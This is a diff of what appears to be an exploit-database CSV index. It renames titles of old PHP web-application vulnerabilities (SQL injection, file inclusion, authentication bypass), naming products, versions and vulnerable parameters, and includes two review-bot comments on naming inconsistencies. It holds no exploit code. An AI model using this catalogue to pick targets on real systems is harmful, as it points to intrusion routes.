+6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - 'INC' Parameter Remote File Inclusion",2008-09-17,ka0x,php,webapps,0
+6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps,0
+6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Parameter Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0
 6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0
 6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0
-6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php es_id' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0
-6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0
-6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0
-6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0
-6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
-6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
+6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0
+6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' Parameter SQL Injection",2008-09-18,ka0x,php,webapps,0
+6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' Parameter SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0
+6487,platforms/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Parameter Local File Disclosure",2008-09-18,xy7,php,webapps,0
+6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
+6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Parameter Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0
 6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0
@@ -19470,19 +19480,19 @@ id,file,description,date,author,platform,type,port
 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0
 6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0
 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - 'index.php' SQL Injection",2008-09-20,0x90,php,webapps,0
-6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - (area) SQL Injection",2008-09-20,ZoRLu,php,webapps,0
-6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0
-6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - (show_vote.php id) SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0
-6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php id' SQL Injection",2008-09-20,r45c4l,php,webapps,0
+6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - 'area' Parameter SQL Injection",2008-09-20,ZoRLu,php,webapps,0
+6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' Parameter SQL Injection",2008-09-20,r45c4l,php,webapps,0
+6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - 'show_vote.php' SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0
+6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php' SQL Injection",2008-09-20,r45c4l,php,webapps,0
 6507,platforms/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,php,webapps,0
 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0
 6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0
 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0
 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' Parameter SQL Injection",2008-09-21,"Hussin X",php,webapps,0
-6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
+6512,platforms/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Parameter Blind SQL Injection",2008-09-21,Stack,php,webapps,0
 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
 6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
-6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
+6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,php,webapps,0
 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0
@@ -19490,41 +19500,41 @@ id,file,description,date,author,platform,type,port
 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0
 6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0
-6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0
+6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - 'vote.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0
-6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0
-6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - (news_detail.asp id) SQL Injection",2008-09-22,"CWH Underground",php,webapps,0
+6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' Parameter SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0
+6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - 'news_detail.asp' SQL Injection",2008-09-22,"CWH Underground",php,webapps,0
 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps,0
-6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0
+6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Parameter Local File Inclusion",2008-09-22,dun,php,webapps,0
 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0
-6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0
-6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0
+6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion",2008-09-22,dun,php,webapps,0
+6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - 'list.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps,0
-6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0
-6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0
+6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0
+6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0
 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps,0
 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0
-6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'sayfa.php kat' SQL Injection",2008-09-23,d3v1l,php,webapps,0
+6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' Parameter SQL Injection",2008-09-23,d3v1l,php,webapps,0
 6543,platforms/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0
-6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0
-6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0
+6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Parameter Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0
+6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' Parameter SQL Injection",2008-09-24,"Hussin X",php,webapps,0
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0
 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0
-6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0
-6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0
-6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0
+6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0
+6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0
+6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - 'defs.php' Local File Inclusion",2008-09-24,dun,php,webapps,0
 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - 'recruit_details.php' SQL Injection",2008-09-24,r45c4l,php,webapps,0
-6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0
+6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Parameter Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0
 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0
 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
-6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0
-6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0
-6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0
+6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
+6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
+6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
 6566,platforms/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0
 6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0
@@ -19533,7 +19543,7 @@ id,file,description,date,author,platform,type,port
 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps,0
 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
-6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
+6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
 6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
 6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
@@ -19563,7 +19573,7 @@ id,file,description,date,author,platform,type,port
 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
-6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection",2008-09-28,StAkeR,php,webapps,0
+6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
 6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
@@ -19666,7 +19676,7 @@ id,file,description,date,author,platform,type,port
 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
-6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
+6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
 6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0
@@ -19720,7 +19730,7 @@ id,file,description,date,author,platform,type,port
 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0
 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
-6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
+6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0
@@ -19871,7 +19881,7 @@ id,file,description,date,author,platform,type,port
 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
-7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
+7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
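Review bot: Row 7008 loses its vulnerability class: `(Authentication Bypass) SQL Injection` becomes `Authentication Bypass`, so the entry no longer records that the bypass is SQL-injection based, while the untouched neighbour 7010 keeps `(Authentication Bypass) SQL Injection` and 7004 uses `SQL Injection (Authentication Bypass)`, leaving three spellings of one class in a seven-line window. The same drop happens to 7932 in the hunk at `@@ -20555`. If the intent is normalization, 7004's form keeps both facts: `"Pre Real Estate Listings - SQL Injection (Authentication Bypass)"`.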
@@ -20027,7 +20037,7 @@ id,file,description,date,author,platform,type,port
 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
-7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0
+7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' Parameter SQL Injection",2008-11-24,"Hussin X",php,webapps,0
 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0
 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
@@ -20555,7 +20565,7 @@ id,file,description,date,author,platform,type,port
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
-7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
+7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
@@ -22096,7 +22106,7 @@ id,file,description,date,author,platform,type,port
 10800,platforms/php/webapps/10800.txt,"I-RATER Basic - Arbitrary File Upload",2009-12-30,indoushka,php,webapps,0
 10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Arbitrary File Upload",2009-12-30,indoushka,php,webapps,0
 10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,php,webapps,0
-10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0
+10805,platforms/php/webapps/10805.txt,"Diesel Job Site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0
 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,php,webapps,0
 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,php,webapps,0
 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,php,webapps,0
@@ -22229,7 +22239,7 @@ id,file,description,date,author,platform,type,port
 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0
 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0
 11076,platforms/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0
-11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game - (game) SQL Injection",2010-01-10,Err0R,php,webapps,0
+11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game - SQL Injection",2010-01-10,Err0R,php,webapps,0
 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injections",2010-01-10,Cyber_945,php,webapps,0
 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0
 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r and Ablus",php,webapps,0
@@ -23135,7 +23145,7 @@ id,file,description,date,author,platform,type,port
 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
 12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
 12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
-12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
+12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
 12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
@@ -25524,7 +25534,7 @@ id,file,description,date,author,platform,type,port
 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0
 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0
-19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
+19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
 20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0
 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q Parameter) SQL Injection",2012-07-22,muts,php,webapps,0
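Review bot: Row 19985 drops the vendor from the product name (`NetArt Media iBoutique 4.0` becomes `iBoutique 4.0`), while 7208 in the hunk at `@@ -20027` keeps `Netartmedia Real Estate Portal 1.2` and untouched neighbours such as `Dell SonicWALL Scrutinizer 9.0.1` keep theirs, so a vendor-based search will no longer find this entry. I would keep the vendor, `"NetArt Media iBoutique 4.0 - 'key' Parameter SQL Injection"`, unless there is a catalogue rule that only the product name is recorded; if there is, 7208 should follow it too.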
@@ -26275,7 +26285,7 @@ id,file,description,date,author,platform,type,port
 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps,0
 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0
 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0
-22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0
+22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0
 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0
